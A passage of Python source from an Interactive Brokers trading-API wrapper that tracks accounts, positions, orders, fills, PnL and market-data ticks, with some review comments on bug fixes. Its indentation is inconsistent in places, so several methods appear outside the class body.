    # Order/trade bookkeeping.
    trades: Dict[(OrderKeyType, Trade)]
    permId2Trade: Dict[(int, Trade)]
    fills: Dict[(str, Fill)]
    # News.
    newsTicks: List[NewsTick]
    msgId2NewsBulletin: Dict[(int, NewsBulletin)]
    # Market-data tickers and subscriptions, indexed by request id.
    tickers: Dict[(int, Ticker)]
    pendingTickers: Set[Ticker]
    reqId2Ticker: Dict[(int, Ticker)]
    ticker2ReqId: Dict[(Union[(int, str)], Dict[(Ticker, int)])]
    reqId2Subscriber: Dict[(int, Any)]
    # PnL subscriptions.
    reqId2PnL: Dict[(int, PnL)]
    reqId2PnlSingle: Dict[(int, PnLSingle)]
    pnlKey2ReqId: Dict[(tuple, int)]
    pnlSingleKey2ReqId: Dict[(tuple, int)]
    # Connection/session state.
    lastTime: datetime
    accounts: List[str]
    clientId: int
    wshMetaReqId: int
    wshEventReqId: int
    # Internals: pending requests, results and the idle-timeout machinery.
    _reqId2Contract: Dict[(int, Contract)]
    _timeout: float
    _futures: Dict[(Any, asyncio.Future)]
    _results: Dict[(Any, Any)]
    _logger: logging.Logger
    _timeoutHandle: Union[(asyncio.TimerHandle, None)]
    def __init__(self, ib: 'IB'):
        """Bind to the owning IB instance and initialize all state."""
        self.ib = ib
        self._logger = logging.getLogger('ib_insync.wrapper')
        self._timeoutHandle = None
        self.reset()
    def reset(self):
        """(Re)initialize every state container to its empty/default value
        and disable the idle timeout."""
        self.accountValues = {}
        self.acctSummary = {}
        self.portfolio = defaultdict(dict)
        self.positions = defaultdict(dict)
        self.trades = {}
        self.permId2Trade = {}
        self.fills = {}
        self.newsTicks = []
        self.msgId2NewsBulletin = {}
        self.tickers = {}
        self.pendingTickers = set()
        self.reqId2Ticker = {}
        self.ticker2ReqId = defaultdict(dict)
        self.reqId2Subscriber = {}
        self.reqId2PnL = {}
        self.reqId2PnlSingle = {}
        self.pnlKey2ReqId = {}
        self.pnlSingleKey2ReqId = {}
        self.lastTime = datetime.min
        self.accounts = []
        self.clientId = (- 1)
        self.wshMetaReqId = 0
        self.wshEventReqId = 0
        self._reqId2Contract = {}
        self._timeout = 0
        self._futures = {}
        self._results = {}
        # Cancels any pending idle-timeout timer.
        self.setTimeout(0)
    def setEventsDone(self):
        """Mark all ticker, subscriber and trade events as done (no more
        updates will follow)."""
        events = [ticker.updateEvent for ticker in self.tickers.values()]
        events += [sub.updateEvent for sub in self.reqId2Subscriber.values()]
        for trade in self.trades.values():
            events += [trade.statusEvent, trade.modifyEvent, trade.fillEvent, trade.filledEvent, trade.commissionReportEvent, trade.cancelEvent, trade.cancelledEvent]
        for event in events:
            event.set_done()

    def connectionClosed(self):
        """On socket disconnect: fail every pending request's Future, emit a
        global error and reset all state."""
        error = ConnectionError('Socket disconnect')
        for future in self._futures.values():
            if (not future.done()):
                future.set_exception(error)
        globalErrorEvent.emit(error)
        self.reset()
    def startReq(self, key, contract=None, container=None):
        """Register a new request under ``key``: create a Future plus a result
        container (a fresh list unless one is supplied) and return the Future."""
        future: asyncio.Future = asyncio.Future()
        self._futures[key] = future
        self._results[key] = (container if (container is not None) else [])
        if contract:
            self._reqId2Contract[key] = contract
        return future

    def _endReq(self, key, result=None, success=True):
        """Finish the request for ``key``: resolve its Future with ``result``
        (or the accumulated container when result is None), or set it as the
        exception when ``success`` is False. No-op for unknown keys."""
        future = self._futures.pop(key, None)
        self._reqId2Contract.pop(key, None)
        if future:
            if (result is None):
                result = self._results.pop(key, [])
            if (not future.done()):
                if success:
                    future.set_result(result)
                else:
                    future.set_exception(result)
def startTicker(self, reqId: int, contract: Contract, tickType: Union[(int, str)]):
ticker = self.tickers.get(id(contract))
if (not ticker):
ticker = Ticker(contract=contract, ticks=[], tickByTicks=[], domBids=[], domAsks=[], domTicks=[])
self.tickers[id(contract)] = ticker
self.reqId2Ticker[reqId] = ticker
self._reqId2Contract[reqId] = contract
self.ticker2ReqId[tickType][ticker] = reqId
return ticker
def endTicker(self, ticker: Ticker, tickType: Union[(int, str)]):
reqId = self.ticker2ReqId[tickType].pop(ticker, 0)
self._reqId2Contract.pop(reqId, None)
return reqId
def startSubscription(self, reqId, subscriber, contract=None):
self._reqId2Contract[reqId] = contract
self.reqId2Subscriber[reqId] = subscriber
def endSubscription(self, subscriber):
    """Unregister a live subscription using the subscriber's own reqId."""
    self._reqId2Contract.pop(subscriber.reqId, None)
    self.reqId2Subscriber.pop(subscriber.reqId, None)
def orderKey(self, clientId: int, orderId: int, permId: int) -> OrderKeyType:
    """Return the trades-dict key: ``(clientId, orderId)`` for a positive
    orderId, otherwise fall back to ``permId``."""
    if orderId > 0:
        return (clientId, orderId)
    return permId
def setTimeout(self, timeout: float):
    """(Re)arm the idle-timeout watchdog; ``timeout=0`` disables it."""
    self.lastTime = datetime.now(timezone.utc)
    if self._timeoutHandle:
        self._timeoutHandle.cancel()
    self._timeoutHandle = None
    self._timeout = timeout
    if timeout:
        self._setTimer(timeout)
def _setTimer(self, delay: float=0):
    """Schedule the next watchdog check, or emit ``timeoutEvent`` if expired.

    Reschedules itself via ``loop.call_later`` until the elapsed time since
    ``lastTime`` exceeds the configured timeout.
    """
    if (self.lastTime == datetime.min):
        return
    now = datetime.now(timezone.utc)
    diff = (now - self.lastTime).total_seconds()
    if (not delay):
        delay = (self._timeout - diff)
    if (delay > 0):
        loop = getLoop()
        self._timeoutHandle = loop.call_later(delay, self._setTimer)
    else:
        self._logger.debug('Timeout')
        # Disable the watchdog before emitting so handlers may re-arm it.
        self.setTimeout(0)
        self.ib.timeoutEvent.emit(diff)
def connectAck(self):
    """No-op: connection acknowledgement needs no wrapper-side handling."""
    pass
def nextValidId(self, reqId: int):
    """No-op: order id tracking is handled elsewhere."""
    pass
def managedAccounts(self, accountsList: str):
    """Store the comma-separated managed-accounts list, dropping empties."""
    self.accounts = list(filter(None, accountsList.split(',')))
def updateAccountTime(self, timestamp: str):
    """No-op: the account timestamp is not tracked."""
    pass
def updateAccountValue(self, tag: str, val: str, currency: str, account: str):
    """Store an account value (empty model code) and emit accountValueEvent."""
    key = (account, tag, currency, '')
    acctVal = AccountValue(account, tag, val, currency, '')
    self.accountValues[key] = acctVal
    self.ib.accountValueEvent.emit(acctVal)
def accountDownloadEnd(self, _account: str):
    """Resolve the pending 'accountValues' request."""
    self._endReq('accountValues')
def accountUpdateMulti(self, reqId: int, account: str, modelCode: str, tag: str, val: str, currency: str):
    """Store a per-model account value and emit accountValueEvent."""
    key = (account, tag, currency, modelCode)
    acctVal = AccountValue(account, tag, val, currency, modelCode)
    self.accountValues[key] = acctVal
    self.ib.accountValueEvent.emit(acctVal)
def accountUpdateMultiEnd(self, reqId: int):
    """Resolve the pending account-update-multi request."""
    self._endReq(reqId)
def accountSummary(self, _reqId: int, account: str, tag: str, value: str, currency: str):
    """Store an account-summary value and emit accountSummaryEvent."""
    key = (account, tag, currency)
    acctVal = AccountValue(account, tag, value, currency, '')
    self.acctSummary[key] = acctVal
    self.ib.accountSummaryEvent.emit(acctVal)
def accountSummaryEnd(self, reqId: int):
    """Resolve the pending account-summary request."""
    self._endReq(reqId)
def updatePortfolio(self, contract: Contract, posSize: float, marketPrice: float, marketValue: float, averageCost: float, unrealizedPNL: float, realizedPNL: float, account: str):
    """Update (or remove, when size hits 0) a portfolio item and emit an event."""
    # Re-create to get the most specific Contract subclass.
    contract = Contract.create(**dataclassAsDict(contract))
    portfItem = PortfolioItem(contract, posSize, marketPrice, marketValue, averageCost, unrealizedPNL, realizedPNL, account)
    portfolioItems = self.portfolio[account]
    if (posSize == 0):
        portfolioItems.pop(contract.conId, None)
    else:
        portfolioItems[contract.conId] = portfItem
    self._logger.info(f'updatePortfolio: {portfItem}')
    self.ib.updatePortfolioEvent.emit(portfItem)
def position(self, account: str, contract: Contract, posSize: float, avgCost: float):
    """Update (or remove, when size hits 0) a position, feed any pending
    'positions' request, and emit positionEvent."""
    contract = Contract.create(**dataclassAsDict(contract))
    position = Position(account, contract, posSize, avgCost)
    positions = self.positions[account]
    if (posSize == 0):
        positions.pop(contract.conId, None)
    else:
        positions[contract.conId] = position
    self._logger.info(f'position: {position}')
    results = self._results.get('positions')
    if (results is not None):
        results.append(position)
    self.ib.positionEvent.emit(position)
def positionEnd(self):
    """Resolve the pending 'positions' request."""
    self._endReq('positions')
def positionMulti(self, reqId: int, account: str, modelCode: str, contract: Contract, pos: float, avgCost: float):
    """No-op: per-model positions are not tracked."""
    pass
def positionMultiEnd(self, reqId: int):
    """No-op counterpart of positionMulti."""
    pass
def pnl(self, reqId: int, dailyPnL: float, unrealizedPnL: float, realizedPnL: float):
    """Update the PnL object registered for ``reqId`` in place and emit pnlEvent."""
    pnl = self.reqId2PnL.get(reqId)
    if (not pnl):
        return
    pnl.dailyPnL = dailyPnL
    pnl.unrealizedPnL = unrealizedPnL
    pnl.realizedPnL = realizedPnL
    self.ib.pnlEvent.emit(pnl)
def pnlSingle(self, reqId: int, pos: int, dailyPnL: float, unrealizedPnL: float, realizedPnL: float, value: float):
    """Update the single-position PnL object for ``reqId`` and emit pnlSingleEvent."""
    pnlSingle = self.reqId2PnlSingle.get(reqId)
    if (not pnlSingle):
        return
    pnlSingle.position = pos
    pnlSingle.dailyPnL = dailyPnL
    pnlSingle.unrealizedPnL = unrealizedPnL
    pnlSingle.realizedPnL = realizedPnL
    pnlSingle.value = value
    self.ib.pnlSingleEvent.emit(pnlSingle)
def openOrder(self, orderId: int, contract: Contract, order: Order, orderState: OrderState):
    """Handle an open-order report: resolve what-if requests, sync or create
    the corresponding Trade, and emit/collect it.
    """
    if order.whatIf:
        # What-if order: resolve the margin/commission preview request.
        if (orderState.initMarginChange != str(UNSET_DOUBLE)):
            self._endReq(order.orderId, orderState)
    else:
        key = self.orderKey(order.clientId, order.orderId, order.permId)
        trade = self.trades.get(key)
        if trade:
            # Known trade: sync the fields the server may have changed.
            trade.order.permId = order.permId
            trade.order.totalQuantity = order.totalQuantity
            trade.order.lmtPrice = order.lmtPrice
            trade.order.auxPrice = order.auxPrice
            trade.order.orderType = order.orderType
            trade.order.orderRef = order.orderRef
        else:
            # Unknown trade: build it, dropping '?' placeholder field values.
            order = Order(**{k: v for (k, v) in dataclassAsDict(order).items() if (v != '?')})
            contract = Contract.create(**dataclassAsDict(contract))
            orderStatus = OrderStatus(orderId=orderId, status=orderState.status)
            trade = Trade(contract, order, orderStatus, [], [])
            self.trades[key] = trade
            self._logger.info(f'openOrder: {trade}')
        self.permId2Trade.setdefault(order.permId, trade)
        results = self._results.get('openOrders')
        if (results is None):
            # Live update rather than a reqOpenOrders snapshot.
            self.ib.openOrderEvent.emit(trade)
        else:
            results.append(trade)
    # Make sure the client's id sequence stays ahead of seen order ids.
    self.ib.client.updateReqId((orderId + 1))
def openOrderEnd(self):
    """Resolve the pending 'openOrders' request."""
    self._endReq('openOrders')
def completedOrder(self, contract: Contract, order: Order, orderState: OrderState):
    """Collect a completed order as a Trade; register it if not yet known."""
    contract = Contract.create(**dataclassAsDict(contract))
    orderStatus = OrderStatus(orderId=order.orderId, status=orderState.status)
    trade = Trade(contract, order, orderStatus, [], [])
    self._results['completedOrders'].append(trade)
    if (order.permId not in self.permId2Trade):
        self.trades[order.permId] = trade
        self.permId2Trade[order.permId] = trade
def completedOrdersEnd(self):
    """Resolve the pending 'completedOrders' request."""
    self._endReq('completedOrders')
def orderStatus(self, orderId: int, status: str, filled: float, remaining: float, avgFillPrice: float, permId: int, parentId: int, lastFillPrice: float, clientId: int, whyHeld: str, mktCapPrice: float=0.0):
    """Update a trade's OrderStatus, append a log entry when something
    changed, and emit status/filled/cancelled events as appropriate.
    """
    key = self.orderKey(clientId, orderId, permId)
    trade = self.trades.get(key)
    if trade:
        msg: Optional[str]
        oldStatus = trade.orderStatus.status
        new = dict(status=status, filled=filled, remaining=remaining, avgFillPrice=avgFillPrice, permId=permId, parentId=parentId, lastFillPrice=lastFillPrice, clientId=clientId, whyHeld=whyHeld, mktCapPrice=mktCapPrice)
        curr = dataclassAsDict(trade.orderStatus)
        # Compare via dict-merge so missing keys in `new` don't count as changes.
        isChanged = (curr != {**curr, **new})
        if isChanged:
            dataclassUpdate(trade.orderStatus, **new)
            msg = ''
        elif ((status == 'Submitted') and trade.log and (trade.log[(- 1)].message == 'Modify')):
            # Unchanged status right after a modify request: record 'Modified'.
            msg = 'Modified'
        else:
            msg = None  # nothing to log or emit
        if (msg is not None):
            logEntry = TradeLogEntry(self.lastTime, status, msg)
            trade.log.append(logEntry)
            self._logger.info(f'orderStatus: {trade}')
            self.ib.orderStatusEvent.emit(trade)
            trade.statusEvent.emit(trade)
            if (status != oldStatus):
                if (status == OrderStatus.Filled):
                    trade.filledEvent.emit(trade)
                elif (status == OrderStatus.Cancelled):
                    trade.cancelledEvent.emit(trade)
    else:
        self._logger.error('orderStatus: No order found for orderId %s and clientId %s', orderId, clientId)
def execDetails(self, reqId: int, contract: Contract, execution: Execution):
    """Handle an execution report: create/store the Fill, attach it to the
    owning Trade, and either emit it (live) or collect it (request replay).
    """
    self._logger.info(f'execDetails {execution}')
    if (execution.orderId == UNSET_INTEGER):
        # Orders placed with other clients have no valid orderId.
        execution.orderId = 0
    trade = self.permId2Trade.get(execution.permId)
    if (not trade):
        key = self.orderKey(execution.clientId, execution.orderId, execution.permId)
        trade = self.trades.get(key)
    if (trade and (contract == trade.contract)):
        contract = trade.contract
    else:
        contract = Contract.create(**dataclassAsDict(contract))
    execId = execution.execId
    # A reqId without a pending future means this is a live execution.
    isLive = (reqId not in self._futures)
    time = (self.lastTime if isLive else execution.time)
    fill = Fill(contract, execution, CommissionReport(), time)
    if (execId not in self.fills):
        self.fills[execId] = fill
        if trade:
            trade.fills.append(fill)
            # Fixed: separate size and price with '@' (was 'Fill {shares}{price}',
            # which ran the two numbers together in the trade log).
            logEntry = TradeLogEntry(time, trade.orderStatus.status, f'Fill {execution.shares}@{execution.price}')
            trade.log.append(logEntry)
            if isLive:
                self._logger.info(f'execDetails: {fill}')
                self.ib.execDetailsEvent.emit(trade, fill)
                trade.fillEvent(trade, fill)
    if (not isLive):
        self._results[reqId].append(fill)
def execDetailsEnd(self, reqId: int):
    """Resolve the pending executions request."""
    self._endReq(reqId)
def commissionReport(self, commissionReport: CommissionReport):
    """Attach a commission report to its Fill and emit commission events."""
    # Normalize unset sentinel values to 0.0.
    if (commissionReport.yield_ == UNSET_DOUBLE):
        commissionReport.yield_ = 0.0
    if (commissionReport.realizedPNL == UNSET_DOUBLE):
        commissionReport.realizedPNL = 0.0
    fill = self.fills.get(commissionReport.execId)
    if fill:
        report = dataclassUpdate(fill.commissionReport, commissionReport)
        self._logger.info(f'commissionReport: {report}')
        trade = self.permId2Trade.get(fill.execution.permId)
        if trade:
            self.ib.commissionReportEvent.emit(trade, fill, report)
            trade.commissionReportEvent.emit(trade, fill, report)
        else:
            # Unknown trade: report is stored on the fill but not emitted.
            pass
    else:
        # Unknown execId: silently dropped.
        # NOTE(review): presumably the matching execDetails always arrives
        # first; confirm this ordering assumption.
        pass
def orderBound(self, reqId: int, apiClientId: int, apiOrderId: int):
    """No-op: order binding notifications are ignored."""
    pass
def contractDetails(self, reqId: int, contractDetails: ContractDetails):
    """Collect a contract-details result for the pending request."""
    self._results[reqId].append(contractDetails)
# Bond contract details arrive through the same handler (class-level alias).
bondContractDetails = contractDetails
def contractDetailsEnd(self, reqId: int):
    """Resolve the pending contract-details request."""
    self._endReq(reqId)
def symbolSamples(self, reqId: int, contractDescriptions: List[ContractDescription]):
    """Resolve the matching-symbols request with the received descriptions."""
    self._endReq(reqId, contractDescriptions)
def marketRule(self, marketRuleId: int, priceIncrements: List[PriceIncrement]):
    """Resolve the market-rule request keyed by rule id."""
    self._endReq(f'marketRule-{marketRuleId}', priceIncrements)
def marketDataType(self, reqId: int, marketDataId: int):
    """Record the market data type (live/frozen/delayed/...) on the ticker."""
    ticker = self.reqId2Ticker.get(reqId)
    if ticker:
        ticker.marketDataType = marketDataId
def realtimeBar(self, reqId: int, time: int, open_: float, high: float, low: float, close: float, volume: float, wap: float, count: int):
    """Append a real-time bar to its subscription list and emit updates."""
    dt = datetime.fromtimestamp(time, timezone.utc)
    bar = RealTimeBar(dt, (- 1), open_, high, low, close, volume, wap, count)
    bars = self.reqId2Subscriber.get(reqId)
    if (bars is not None):
        bars.append(bar)
        self.ib.barUpdateEvent.emit(bars, True)
        bars.updateEvent.emit(bars, True)
def historicalData(self, reqId: int, bar: BarData):
    """Collect one historical bar, parsing its date string in place."""
    results = self._results.get(reqId)
    if (results is not None):
        bar.date = parseIBDatetime(bar.date)
        results.append(bar)
def historicalDataEnd(self, reqId, _start: str, _end: str):
    """Resolve the pending historical-data request."""
    self._endReq(reqId)
def historicalDataUpdate(self, reqId: int, bar: BarData):
    """Handle a keep-up-to-date bar: append a new bar or update the last one."""
    bars = self.reqId2Subscriber.get(reqId)
    if (not bars):
        return
    bar.date = parseIBDatetime(bar.date)
    lastDate = bars[(- 1)].date
    if (bar.date < lastDate):
        # Out-of-order bar: ignore.
        return
    # NOTE(review): `bars` is guaranteed non-empty here (the `not bars` guard
    # above already returned), so the len(bars) == 0 test can never fire.
    hasNewBar = ((len(bars) == 0) or (bar.date > lastDate))
    if hasNewBar:
        bars.append(bar)
    elif (bars[(- 1)] != bar):
        bars[(- 1)] = bar
    else:
        # Identical to the current last bar: nothing to emit.
        return
    self.ib.barUpdateEvent.emit(bars, hasNewBar)
    bars.updateEvent.emit(bars, hasNewBar)
def headTimestamp(self, reqId: int, headTimestamp: str):
    """Resolve the head-timestamp request; a parse failure resolves it as error."""
    try:
        dt = parseIBDatetime(headTimestamp)
        self._endReq(reqId, dt)
    except ValueError as exc:
        self._endReq(reqId, exc, False)
def historicalTicks(self, reqId: int, ticks: List[HistoricalTick], done: bool):
    """Accumulate historical midpoint ticks; resolve the request when done."""
    result = self._results.get(reqId)
    if (result is not None):
        result += ticks
    if done:
        self._endReq(reqId)
def historicalTicksBidAsk(self, reqId: int, ticks: List[HistoricalTickBidAsk], done: bool):
    """Accumulate historical bid/ask ticks; resolve the request when done."""
    result = self._results.get(reqId)
    if (result is not None):
        result += ticks
    if done:
        self._endReq(reqId)
def historicalTicksLast(self, reqId: int, ticks: List[HistoricalTickLast], done: bool):
    """Accumulate historical trade ticks; resolve the request when done."""
    result = self._results.get(reqId)
    if (result is not None):
        result += ticks
    if done:
        self._endReq(reqId)
def priceSizeTick(self, reqId: int, tickType: int, price: float, size: float):
    """Route a combined price+size tick to the matching Ticker field(s).

    Tick type pairs like (1, 66) are the live and delayed variants of the
    same field. Previous values are saved in the ``prev*`` attributes before
    overwriting. A TickData entry is recorded when price or size is non-zero.
    """
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        self._logger.error(f'priceSizeTick: Unknown reqId: {reqId}')
        return
    if (tickType in (1, 66)):
        # Bid price/size (live/delayed).
        if ((price == ticker.bid) and (size == ticker.bidSize)):
            return
        if (price != ticker.bid):
            ticker.prevBid = ticker.bid
            ticker.bid = price
        if (size != ticker.bidSize):
            ticker.prevBidSize = ticker.bidSize
            ticker.bidSize = size
    elif (tickType in (2, 67)):
        # Ask price/size (live/delayed).
        if ((price == ticker.ask) and (size == ticker.askSize)):
            return
        if (price != ticker.ask):
            ticker.prevAsk = ticker.ask
            ticker.ask = price
        if (size != ticker.askSize):
            ticker.prevAskSize = ticker.askSize
            ticker.askSize = size
    elif (tickType in (4, 68)):
        # Last trade price/size (live/delayed).
        if (price != ticker.last):
            ticker.prevLast = ticker.last
            ticker.last = price
        if (size != ticker.lastSize):
            ticker.prevLastSize = ticker.lastSize
            ticker.lastSize = size
    elif (tickType in (6, 72)):
        ticker.high = price
    elif (tickType in (7, 73)):
        ticker.low = price
    elif (tickType in (9, 75)):
        ticker.close = price
    elif (tickType in (14, 76)):
        ticker.open = price
    elif (tickType == 15):
        ticker.low13week = price
    elif (tickType == 16):
        ticker.high13week = price
    elif (tickType == 17):
        ticker.low26week = price
    elif (tickType == 18):
        ticker.high26week = price
    elif (tickType == 19):
        ticker.low52week = price
    elif (tickType == 20):
        ticker.high52week = price
    elif (tickType == 35):
        ticker.auctionPrice = price
    elif (tickType == 37):
        ticker.markPrice = price
    elif (tickType in (50, 103)):
        ticker.bidYield = price
    elif (tickType in (51, 104)):
        ticker.askYield = price
    elif (tickType == 52):
        ticker.lastYield = price
    if (price or size):
        tick = TickData(self.lastTime, tickType, price, size)
        ticker.ticks.append(tick)
    self.pendingTickers.add(ticker)
def tickSize(self, reqId: int, tickType: int, size: float):
    """Route a size-only tick to the matching Ticker field.

    For bid/ask/last sizes the corresponding price is attached to the
    recorded TickData; other types are plain field assignments.
    """
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        self._logger.error(f'tickSize: Unknown reqId: {reqId}')
        return
    price = (- 1.0)
    if (tickType in (0, 69)):
        # Bid size (live/delayed).
        if (size == ticker.bidSize):
            return
        price = ticker.bid
        ticker.prevBidSize = ticker.bidSize
        ticker.bidSize = size
    elif (tickType in (3, 70)):
        # Ask size (live/delayed).
        if (size == ticker.askSize):
            return
        price = ticker.ask
        ticker.prevAskSize = ticker.askSize
        ticker.askSize = size
    elif (tickType in (5, 71)):
        # Last size (live/delayed); ignored until a last price is known.
        price = ticker.last
        if isNan(price):
            return
        if (size != ticker.lastSize):
            ticker.prevLastSize = ticker.lastSize
            ticker.lastSize = size
    elif (tickType in (8, 74)):
        ticker.volume = size
    elif (tickType == 21):
        ticker.avVolume = size
    elif (tickType == 27):
        ticker.callOpenInterest = size
    elif (tickType == 28):
        ticker.putOpenInterest = size
    elif (tickType == 29):
        ticker.callVolume = size
    elif (tickType == 30):
        ticker.putVolume = size
    elif (tickType == 34):
        ticker.auctionVolume = size
    elif (tickType == 36):
        ticker.auctionImbalance = size
    elif (tickType == 61):
        ticker.regulatoryImbalance = size
    elif (tickType == 86):
        ticker.futuresOpenInterest = size
    elif (tickType == 87):
        ticker.avOptionVolume = size
    elif (tickType == 89):
        ticker.shortableShares = size
    if (price or size):
        tick = TickData(self.lastTime, tickType, price, size)
        ticker.ticks.append(tick)
    self.pendingTickers.add(ticker)
def tickSnapshotEnd(self, reqId: int):
    """Resolve the pending snapshot request."""
    self._endReq(reqId)
def tickByTickAllLast(self, reqId: int, tickType: int, time: int, price: float, size: float, tickAttribLast: TickAttribLast, exchange, specialConditions):
    """Handle a tick-by-tick trade: update last price/size and record the tick."""
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        self._logger.error(f'tickByTickAllLast: Unknown reqId: {reqId}')
        return
    if (price != ticker.last):
        ticker.prevLast = ticker.last
        ticker.last = price
    if (size != ticker.lastSize):
        ticker.prevLastSize = ticker.lastSize
        ticker.lastSize = size
    tick = TickByTickAllLast(tickType, self.lastTime, price, size, tickAttribLast, exchange, specialConditions)
    ticker.tickByTicks.append(tick)
    self.pendingTickers.add(ticker)
def tickByTickBidAsk(self, reqId: int, time: int, bidPrice: float, askPrice: float, bidSize: float, askSize: float, tickAttribBidAsk: TickAttribBidAsk):
    """Handle a tick-by-tick bid/ask: update quote fields and record the tick."""
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        self._logger.error(f'tickByTickBidAsk: Unknown reqId: {reqId}')
        return
    if (bidPrice != ticker.bid):
        ticker.prevBid = ticker.bid
        ticker.bid = bidPrice
    if (bidSize != ticker.bidSize):
        ticker.prevBidSize = ticker.bidSize
        ticker.bidSize = bidSize
    if (askPrice != ticker.ask):
        ticker.prevAsk = ticker.ask
        ticker.ask = askPrice
    if (askSize != ticker.askSize):
        ticker.prevAskSize = ticker.askSize
        ticker.askSize = askSize
    tick = TickByTickBidAsk(self.lastTime, bidPrice, askPrice, bidSize, askSize, tickAttribBidAsk)
    ticker.tickByTicks.append(tick)
    self.pendingTickers.add(ticker)
def tickByTickMidPoint(self, reqId: int, time: int, midPoint: float):
    """Handle a tick-by-tick midpoint: record it on the ticker."""
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        self._logger.error(f'tickByTickMidPoint: Unknown reqId: {reqId}')
        return
    tick = TickByTickMidPoint(self.lastTime, midPoint)
    ticker.tickByTicks.append(tick)
    self.pendingTickers.add(ticker)
def tickString(self, reqId: int, tickType: int, value: str):
    """Parse string-valued ticks (exchanges, fundamentals, RT volume, dividends).

    Malformed values are logged and otherwise ignored.
    """
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        return
    try:
        if (tickType == 32):
            ticker.bidExchange = value
        elif (tickType == 33):
            ticker.askExchange = value
        elif (tickType == 84):
            ticker.lastExchange = value
        elif (tickType == 47):
            # Fundamental ratios arrive as 'KEY=val;KEY=val;...'.
            d = dict((t.split('=') for t in value.split(';') if t))
            for (k, v) in d.items():
                with suppress(ValueError):
                    if (v == '-99999.99'):
                        v = 'nan'
                    # int(v) raises ValueError for non-integral strings and is
                    # suppressed, so values end up int when possible, else float;
                    # non-numeric values keep their original string.
                    d[k] = float(v)
                    d[k] = int(v)
            ticker.fundamentalRatios = FundamentalRatios(**d)
        elif (tickType in (48, 77)):
            # RT volume / RT trade volume: 'price;size;time;volume;vwap;single'.
            (priceStr, sizeStr, rtTime, volume, vwap, _) = value.split(';')
            if volume:
                if (tickType == 48):
                    ticker.rtVolume = float(volume)
                elif (tickType == 77):
                    ticker.rtTradeVolume = float(volume)
            if vwap:
                ticker.vwap = float(vwap)
            if rtTime:
                ticker.rtTime = datetime.fromtimestamp((int(rtTime) / 1000), timezone.utc)
            if (priceStr == ''):
                return
            price = float(priceStr)
            size = float(sizeStr)
            if (price and size):
                if (ticker.prevLast != ticker.last):
                    ticker.prevLast = ticker.last
                    ticker.last = price
                if (ticker.prevLastSize != ticker.lastSize):
                    ticker.prevLastSize = ticker.lastSize
                    ticker.lastSize = size
                tick = TickData(self.lastTime, tickType, price, size)
                ticker.ticks.append(tick)
        elif (tickType == 59):
            # Dividends: 'past12,next12,nextDate,nextAmount' (fields may be empty).
            (past12, next12, nextDate, nextAmount) = value.split(',')
            ticker.dividends = Dividends((float(past12) if past12 else None), (float(next12) if next12 else None), (parseIBDatetime(nextDate) if nextDate else None), (float(nextAmount) if nextAmount else None))
        self.pendingTickers.add(ticker)
    except ValueError:
        self._logger.error(f'tickString with tickType {tickType}: malformed value: {value!r}')
def tickGeneric(self, reqId: int, tickType: int, value: float):
    """Route a generic float tick to its Ticker field and record it."""
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        return
    try:
        value = float(value)
    except ValueError:
        self._logger.error(f'genericTick: malformed value: {value!r}')
        return
    if (tickType == 23):
        ticker.histVolatility = value
    elif (tickType == 24):
        ticker.impliedVolatility = value
    elif (tickType == 31):
        ticker.indexFuturePremium = value
    elif (tickType == 49):
        ticker.halted = value
    elif (tickType == 54):
        ticker.tradeCount = value
    elif (tickType == 55):
        ticker.tradeRate = value
    elif (tickType == 56):
        ticker.volumeRate = value
    elif (tickType == 58):
        ticker.rtHistVolatility = value
    tick = TickData(self.lastTime, tickType, value, 0)
    ticker.ticks.append(tick)
    self.pendingTickers.add(ticker)
def tickReqParams(self, reqId: int, minTick: float, bboExchange: str, snapshotPermissions: int):
    """Store tick request parameters on the ticker."""
    ticker = self.reqId2Ticker.get(reqId)
    if (not ticker):
        return
    ticker.minTick = minTick
    ticker.bboExchange = bboExchange
    ticker.snapshotPermissions = snapshotPermissions
def smartComponents(self, reqId, components):
    """Resolve the smart-components request."""
    self._endReq(reqId, components)
def mktDepthExchanges(self, depthMktDataDescriptions: List[DepthMktDataDescription]):
    """Resolve the market-depth-exchanges request."""
    self._endReq('mktDepthExchanges', depthMktDataDescriptions)
def updateMktDepth(self, reqId: int, position: int, operation: int, side: int, price: float, size: float):
    """Level-1 depth update: delegate to the L2 handler with no market maker."""
    self.updateMktDepthL2(reqId, position, '', operation, side, price, size)
def updateMktDepthL2(self, reqId: int, position: int, marketMaker: str, operation: int, side: int, price: float, size: float, isSmartDepth: bool=False):
    """Apply a depth-of-market change (0=insert, 1=update, 2=delete) and record it."""
    ticker = self.reqId2Ticker[reqId]
    # side: truthy selects the bid book, falsy the ask book.
    dom = (ticker.domBids if side else ticker.domAsks)
    if (operation == 0):
        dom.insert(position, DOMLevel(price, size, marketMaker))
    elif (operation == 1):
        dom[position] = DOMLevel(price, size, marketMaker)
    elif (operation == 2):
        if (position < len(dom)):
            level = dom.pop(position)
            # Record the delete as a zero-size tick at the removed price.
            price = level.price
            size = 0
    tick = MktDepthData(self.lastTime, position, marketMaker, operation, side, price, size)
    ticker.domTicks.append(tick)
    self.pendingTickers.add(ticker)
def tickOptionComputation(self, reqId: int, tickType: int, tickAttrib: int, impliedVol: float, delta: float, optPrice: float, pvDividend: float, gamma: float, vega: float, theta: float, undPrice: float):
    """Handle option greeks: store them on the ticker's bid/ask/last/model
    greeks slot, or resolve a one-shot calculation request.

    IB sends -1 (prices/vols) and -2 (greeks) as 'not available' sentinels;
    these are mapped to None.
    """
    comp = OptionComputation(
        tickAttrib,
        (impliedVol if (impliedVol != (- 1)) else None),
        (delta if (delta != (- 2)) else None),
        (optPrice if (optPrice != (- 1)) else None),
        (pvDividend if (pvDividend != (- 1)) else None),
        (gamma if (gamma != (- 2)) else None),
        # Fixed: vega and theta previously fell back to themselves
        # (`else vega` / `else theta`), leaking the -2 sentinel instead of
        # None like every other field.
        (vega if (vega != (- 2)) else None),
        (theta if (theta != (- 2)) else None),
        (undPrice if (undPrice != (- 1)) else None))
    ticker = self.reqId2Ticker.get(reqId)
    if ticker:
        # Streaming greeks for a subscribed ticker.
        if (tickType in (10, 80)):
            ticker.bidGreeks = comp
        elif (tickType in (11, 81)):
            ticker.askGreeks = comp
        elif (tickType in (12, 82)):
            ticker.lastGreeks = comp
